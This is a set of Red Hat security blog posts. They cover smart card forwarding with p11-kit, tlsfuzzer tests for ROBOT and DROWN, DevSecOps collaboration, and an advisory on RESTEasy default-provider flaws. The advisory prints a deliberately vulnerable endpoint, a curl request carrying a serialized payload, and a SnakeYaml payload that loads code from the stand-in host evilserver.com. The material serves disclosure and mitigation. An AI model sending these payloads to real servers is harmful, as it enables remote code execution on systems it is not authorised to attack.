    Fedora, by default, includes smart card support; the additional components required to forward the card are available as part of the p11-kit-server package, which should be installed on both client and server. For the following examples we will also use some tools from gnutls-utils; these tools can be installed with DNF as follows:

     $ dnf install p11-kit p11-kit-server gnutls-utils libp11
    

    The following sections assume both local and remote computers are running Fedora and the above packages are installed.

    Setting up the PKCS#11 forwarding server on a local client

    To forward a smart card to a remote server, you first need to identify which smart cards are available. To list the smart cards currently attached to the local computer, use the p11tool command from the gnutls-utils package. For example:

     $ p11tool --list-tokens
     ...
     Token 6:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: opensc-pkcs11.so
     ...
    

    This is the entry for the card I’d like to forward to remote system. The important pieces are the ‘pkcs11:’ URL listed above, and the module name. Once we determine which smart card to forward, we expose it to a local Unix domain socket, with the following p11-kit server command:

     $ p11-kit server --provider /usr/lib64/pkcs11/opensc-pkcs11.so "pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29"
    

    Here we provide, to the server, the module location (optional) with the --provider option, as well as the URL of the card. We used the values from the Module and URL lines of the p11tool output above. When the p11-kit server command starts, it will print the address of the PKCS#11 unix domain socket and the process ID of the server:

    P11_KIT_SERVER_ADDRESS=unix:path=/run/user/12345/p11-kit/pkcs11-12345
    P11_KIT_SERVER_PID=12345
    

    For later use, set the variables output by the tool on your shell prompt (e.g., copy and paste them or call the above p11-kit server command line with eval $(p11-kit server ...)).

    Forwarding and using the PKCS#11 Unix socket on the remote server

    On the remote server, we will initially forward the previously generated PKCS#11 unix socket, and then access the smart card through it. To access the forwarded socket as if it were a smart card, a dedicated PKCS#11 module p11-kit-client.so is provided as part of the p11-kit-server package.

    Preparing the remote system for PKCS#11 socket forwarding

    One important detail you should be aware of, is the file system location of the forwarded socket. By convention, the p11-kit-client.so module utilizes the "user runtime directory", managed by systemd: the directory is created when a user logs in, and removed upon logout, so that the user doesn't need to manually clean up the socket file.

    To locate your user runtime directory, do:

     $ systemd-path user-runtime
     /run/user/1000
    

    The p11-kit-client.so module looks for the socket file under a subdirectory (/run/user/1000/p11-kit in this example). To enable auto-creation of the directory, do:

     $ systemctl --user enable p11-kit-client.service
    

    Forwarding the PKCS#11 socket

    We will use ssh to forward the local PKCS#11 unix socket to the remote server. Following the p11-kit-client convention, we will forward the socket to the remote user run-time path so that cleaning up on disconnect is not required. The remote location of the run-time path can be obtained as follows:

    $ ssh <user>@<remotehost> systemd-path user-runtime
    /run/user/1000
    

    The number at the end of the path above is your user ID in that system (and thus will vary from user to user). You can now forward the Unix domain socket with the -R option of the ssh command (after replacing the example path with the actual run-time path):

     $ ssh -R /run/user/<userID>/p11-kit/pkcs11:${P11_KIT_SERVER_ADDRESS#*=} <user>@<remotehost>
    

    After successfully logging in to the remote host, you can use the forwarded smart card as if it were directly connected to the server. Note that if any error occurs in setting up the forwarding, you will see something like this on your terminal:

    Warning: remote port forwarding failed for listen path /run/user/...
    

    Using the forwarded PKCS#11 socket

    Let’s first make sure it works by listing the forwarded smart card:

     $ ls -l /run/user/1000/p11-kit/pkcs11
     $ p11tool --provider /usr/lib64/pkcs11/p11-kit-client.so --list-tokens
     ...
     Token 0:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: (null)
     ...
    

    We can similarly generate keys, copy objects or certificates to the card, or test them, using the same command. Any application which supports PKCS#11 can perform cryptographic operations through the client module.

    Registering the client module for use with OpenSSL and GnuTLS apps

    To utilize the p11-kit-client module with OpenSSL (via engine_pkcs11 provided by the libp11 package) and GnuTLS applications in Fedora, you have to register it with p11-kit. To do it for the current user, use the following commands:

    $ mkdir -p ~/.config/pkcs11/modules/
    $ echo "module: /usr/lib64/pkcs11/p11-kit-client.so" > ~/.config/pkcs11/modules/p11-kit-client.module
    

    Once this is done both OpenSSL and GnuTLS applications should work, for example:

    $ URL="pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29"
    
    # Generate a key using gnutls' p11tool
    $ p11tool --generate-ecc --login --label test-key "$URL"
    
    # generate a certificate request with the previous key using openssl
    $ openssl req -engine pkcs11 -new -key "$URL;object=test-key;type=private;pin-value=XXXX" \
             -keyform engine -out req.pem -text -subj "/CN=Test user"
    

    Note that the token URL remains the same in the forwarded system as in the original one.

    Using the client module with OpenSSH

    To re-use the already forwarded smart card for authentication with another remote host, you can run ssh and provide the -I option with p11-kit-client.so. For example:

     $ ssh -I /usr/lib64/pkcs11/p11-kit-client.so <user>@<anotherhost>
    

    Using the forwarded socket with NSS applications

    To register the forwarded smart card in NSS applications, you can set it up with the modutil command:

     $ sudo modutil -dbdir /etc/pki/nssdb -add p11-kit-client -libfile /usr/lib64/pkcs11/p11-kit-client.so
     $ modutil -dbdir /etc/pki/nssdb -list
     ...
       3. p11-kit-client
         library name: /usr/lib64/pkcs11/p11-kit-client.so
            uri: pkcs11:library-manufacturer=OpenSC%20Project;library-description=OpenSC%20smartcard%20framework;library-version=0.17
          slots: 1 slot attached
         status: loaded
    
          slot: Nitrokey Nitrokey HSM (010000000000000000000000) 00 00
         token: UserPIN (Daiki's token)
           uri: pkcs11:token=UserPIN%20(Daiki's%20token);manufacturer=www.CardContact.de;serial=DENK0000000;model=PKCS%2315%20emulated
    

    Conclusion

    With the smart card forwarding described above, it is easy to forward your smart card, or any device accessible via PKCS#11, to the “cloud”. The forwarded device can then be used by OpenSSL, GnuTLS, and NSS applications as if it were a local card, enabling a variety of applications that were not previously possible.

    Posted: 2018-01-16T14:30:00+00:00
  • Detecting ROBOT and other vulnerabilities using Red Hat testing tools.

    Authored by: Hubert Kario

    The TLS (Transport Layer Security) protocol, also known as SSL, underpins the security of most Internet protocols. That means the correctness of its implementations protects the safety of communication across network connections.

    The Red Hat Crypto Team, to verify the correctness of the TLS implementations we ship, has created a TLS testing framework which is developed as the open source tlsfuzzer project. That testing framework is being used to detect and fix issues with the OpenSSL, NSS, GnuTLS, and other TLS software we ship.

    Recently, Hanno Böck, Juraj Somorovsky, and Craig Young, responsible for discovery of the ROBOT vulnerability, have identified that tlsfuzzer was one of only two tools able to detect the vulnerability at the time they discovered it. This article describes how to use tlsfuzzer to test for two common vulnerabilities - DROWN and ROBOT (which is an extension of the well known Bleichenbacher attack).

    Getting tlsfuzzer

    tlsfuzzer requires three Python libraries:

    six is available in Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7 and can be installed using the following command:

    yum install python-six
    

    In Fedora, both Python 2 and Python 3 are available, so the Python 2 version of six needs to be installed explicitly using the following command:

    dnf install python2-six
    

    Note: tlsfuzzer and its dependencies are compatible with Python 2.6, Python 2.7, and Python 3, but because Python 2 is the default python on the above mentioned systems, the instructions below will use Python 2 to run it.

    Remaining libraries can be downloaded to a single directory and run from there:

    git clone https://github.com/tomato42/tlsfuzzer.git                             
    cd tlsfuzzer                                                                    
    git clone https://github.com/warner/python-ecdsa .python-ecdsa                  
    ln -s .python-ecdsa/src/ecdsa/ ecdsa                                            
    git clone https://github.com/tomato42/tlslite-ng .tlslite-ng                    
    ln -s .tlslite-ng/tlslite/ tlslite
    

    Running tests

    The tests that can be run live in scripts/ directory. The test for ROBOT (and Bleichenbacher) is called test-bleichenbacher-workaround.py. The test for DROWN is called test-sslv2-force-cipher.py.

    To run those scripts, it's necessary to provide them with the hostname and port the server is running on. For a server running on host example.com on port 443, the commands are as follows:

    PYTHONPATH=. python scripts/test-sslv2-force-cipher.py -h example.com -p 443
    PYTHONPATH=. python scripts/test-bleichenbacher-workaround.py -h example.com -p 443
    

    If the test finishes with a summary like this:

    Test end
    successful: 21
    failed: 0
    

    It means the server passed the tests successfully (behaves in a standards-compliant way) and likely is not vulnerable.

    Note: The server can be vulnerable to the Bleichenbacher attack even if it passes the test, as the attack can use the timing of the responses, not only their contents or presence. Because this script does not measure response times, it cannot detect that covert channel. Passing the test does mean, however, that even if the server is vulnerable, the attack is much harder to perform.

    Many scripts support additional options that may work around some peculiarities of the server under test. A listing of them can be obtained by running the script with the --help option.

    Interpreting failures

    Unfortunately, as the tool is primarily aimed at developers, interpreting the errors requires a bit of Python knowledge and an understanding of TLS. Below is a description of the most common harmless errors that can happen during execution of the scripts.

    Tests in general verify whether the server under test is RFC-compliant (does it follow standards like RFC 5246). As the standards are continuously updated to work around or mitigate known vulnerabilities, standards compliance is a good indicator of the overall robustness of an implementation. Fortunately, not all departures from the behaviour prescribed in the RFCs are vulnerabilities. They do, however, make testing of such non-compliant implementations harder, and more of a guesswork.

    That being said, some errors in test execution may be a result of unexpected server configuration rather than mismatch between expectation of tlsfuzzer and the server. Read below how to workaround them.

    Note: A Failure reported by a script is an indicator of a server not following the expected behaviour, not of failure to communicate. Similarly, a successful test is a test in which server behaved as expected, and does not indicate a successful connection.

    General error

    When execution of a script encounters an error, it will print a message like this:

    zero byte in first byte of random padding ...
    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert object at 0x7f96e7e56a90> (child: <tlsfuzzer.expect.ExpectClose object at 0x7f96e7e56ad0>) with last message being: <tlslite.messages.Message object at 0x7f96e79f4090>
    Error while processing
    Traceback (most recent call last):
      File "scripts/test-bleichenbacher-workaround.py", line 250, in main
        runner.run()
      File "/root/tlsfuzzer/tlsfuzzer/runner.py", line 178, in run
        node.process(self.state, msg)
      File "/root/tlsfuzzer/tlsfuzzer/expect.py", line 571, in process
        raise AssertionError(problem_desc)
    AssertionError: Expected alert description "bad_record_mac" does not match received "handshake_failure"
    

    The first line indicates the name of the scenario that was run; it can be used to reproduce that run alone (by passing it as the last parameter to the script, like this: ...workaround.py -h example.com -p 443 "zero byte in first byte of random padding").

    The second line indicates at which point in the execution the failure happened, in this case during ExpectAlert.

    The last line indicates the kind of error condition that was detected, in this case that the description of the received alert message didn't match the expected one.

    Connection refused or timeout in Connect error

    Pattern:

    Error encountered while processing node <tlsfuzzer.messages.Connect ...
    ...
        sock.connect((self.hostname, self.port))
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    error: [Errno 111] Connection refused
    

    and

    Error encountered while processing node <tlsfuzzer.messages.Connect...
    ...
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    timeout: timed out
    

    The hostname or the port is incorrect for the server, or some system en route blocks communication with the server.

    Unexpected message - Certificate Request

    Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectServerHelloDone
    ...
    AssertionError: Unexpected message from peer: Handshake(certificate_request)
    

    The server is configured to perform client-certificate-based authentication, and the script does not know how to handle it. To perform that test, the server needs to be reconfigured not to request a certificate from the client.
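
    What that reconfiguration looks like depends entirely on the server software; purely as an illustration, if the server under test happened to be Apache httpd with mod_ssl, the client certificate request could be disabled for the duration of the test with:

    # in the ssl.conf / VirtualHost section used for the test
    SSLVerifyClient none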

    Unexpected message - Application Data

    Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert ...
    ...
    AssertionError: Unexpected message from peer: ApplicationData(len=8000)
    

    Note: for most tests the node in question will be ExpectAlert, but in general it is the one right after ExpectApplicationData in the script.

    In the above-mentioned test scripts, this is not an indication of a ROBOT or DROWN vulnerability, but it may indicate other issues. The USAGE.md document of the tlsfuzzer project includes more information about interpreting this and other failures.

    Posted: 2017-12-12T13:56:54+00:00
  • Security is from Mars, Developers are from Venus…...or ARE they?

    Authored by: Christopher Robinson

    It is a tale as old as time. Developers and security personnel view each other with suspicion. The perception is that a vast gulf of understanding and ability lies between the two camps. “They can’t possibly understand what it is to do my job!” is a surprisingly common statement tossed about. Both groups blame the other for being the source of all of their ills. It is well known that fixing security bugs early in the development lifecycle not only helps eliminate exposure to potential vulnerabilities, but it also saves time, effort, and money. Once a defect escapes into production it can be very costly to remediate.

    Years of siloing and specialization have driven deep wedges between these two critical groups. Both teams have the same goal: to enable the business. They just take slightly different paths to get there and have different expertise and focus. In the last few decades we’ve all been forced to work more closely together, with movements like Agile reminding everyone that we’re all ultimately there to serve the business and the best interest of our customers. Today, with the overwhelming drive to move to a DevOps model, to get features and functionality out into the hands of our customers faster, we must work better together to make the whole organization succeed.

    Through this DevOps shift in mindset (Development and Operations working more closely on building, deploying, and maintaining software), both groups have influenced each other’s thinking. Security has started to embrace the benefits of things like iterative releases and continuous deployments, while our coder-counterparts have expanded their test-driven development methods to include more automation of security test cases and have become more mindful of things like the OWASP Top 10 (the Open Web Application Security Project). We are truly on the brink of a DevSecOps arena where we can have fruitful collaboration from the groups that are behind the engine that drives our respective companies. Those that can embrace this exciting new world are poised to reap the benefits.

    Red Hat Product Security is pleased to partner with our friends over in the Red Hat Developer Program. Our peers there are driving innovation in the open source development communities and bringing open source to a new generation of software engineers. It is breathtaking to see the collaboration and ideas that are emerging in this space. We’re equally pleased that security is not just an afterthought for them. Developing and composing software that considers “security by design” from the earliest stages of the development lifecycle helps projects move faster while delivering innovative and secure solutions. They have recently kicked off a new site topic that focuses on secure programming, and we expect it to be a great resource within the development community: Secure Programming at the Red Hat Developer Program.

    In this dedicated space of our developer portal you’ll find a wealth of resources to help coders code with security in mind. You’ll find blogs from noted luminaries. You’ll find defensive coding guides, and other technical materials that will explain how to avoid common coding flaws that could develop into future software vulnerabilities. You’ll also be able to directly engage with Red Hat Developers and other open source communities. This is a great time to establish that partnership and “reach across the aisle” to each other. So whether you are interested in being a better software engineer and writing more secure code, or are looking to advocate for these techniques, Red Hat has a fantastic set of resources to help guide you toward a more secure future!

    Posted: 2017-11-16T15:00:00+00:00
  • Abuse of RESTEasy Default Providers in JBoss EAP

    Authored by: Jason Shepherd

    Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for Restful webservices. A powerful but potentially dangerous feature of Restful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process a request with the default provider matching the Content-Type HTTP header that the client specifies. Some of the default providers were found to have vulnerabilities, which have now been removed from JBoss EAP and its upstream Restful webservice project, RESTEasy.

    The attack vector

    Two important vulnerabilities that used default providers as an attack vector were fixed in the RESTEasy project in 2016. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing one of the following:

    • @Consumes annotation was present specifying wildcard mediaType {*/*}
    • @Consumes annotation was not present on webservice endpoint
    • Webservice endpoint consumes a multipart mediaType

    Here's an example of what a vulnerable webservice would look like:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
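            // No @Consumes annotation here, so RESTEasy accepts any Content-Type
            // and picks a matching default provider to deserialize the request body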
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice how there is no @Consumes annotation on the doConcat method.

    The vulnerabilities

    CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream [1] before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. The issue was reported to Red Hat by Mikhail Egorov of Odin.

    If a Restful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending an HTTP request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializableProvider and could contain a malicious payload generated with ysoserial [2] or similar. Remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.

    Here's an example:

    curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'
    

    CVE-2016-9606 also exploited the default providers of RESTEasy. This time the YamlProvider was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the SnakeYaml library from RESTEasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

    SnakeYaml allows loading classes with a URLClassLoader, using the JDK's ScriptEngineManager. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading and executing that code.

    An example of a malicious request is as follows:

    curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat
    

    Here, evilserver.com is a host controlled by the malicious actor.

    Again, you can see the use of the Content-Type HTTP header to trick RESTEasy into using the YamlProvider, even though the developer didn't intend for it to be accessible.

    How to stay safe

    The latest versions of EAP 6.4.x and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1, and it is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either EAP 6.4.x or 7.0.x.

    If you're using an unpatched release of upstream RESTEasy, be sure to specify the media type you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
            @Consumes("application/json")
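            // Requests with any other Content-Type are rejected by the JAX-RS
            // runtime with a 415 Unsupported Media Type response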
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice that this safe version adds a @Consumes annotation with a media type of application/json.

    This is good practice anyway: if an HTTP client tries to send a request with a different Content-Type HTTP header, the application will return an appropriate error response indicating that the media type is not supported.
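
    For instance, replaying the serialized-object request from earlier against this endpoint (assuming the same example deployment at localhost:8080) should now be rejected with a 415 Unsupported Media Type status instead of being handed to a default provider:

    curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' --data-binary '@payload.ser'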


    1. https://issues.jboss.org/browse/RESTEASY-1269 

    2. https://github.com/frohoff/ysoserial 

    Posted: 2017-10-18T13:30:00+00:00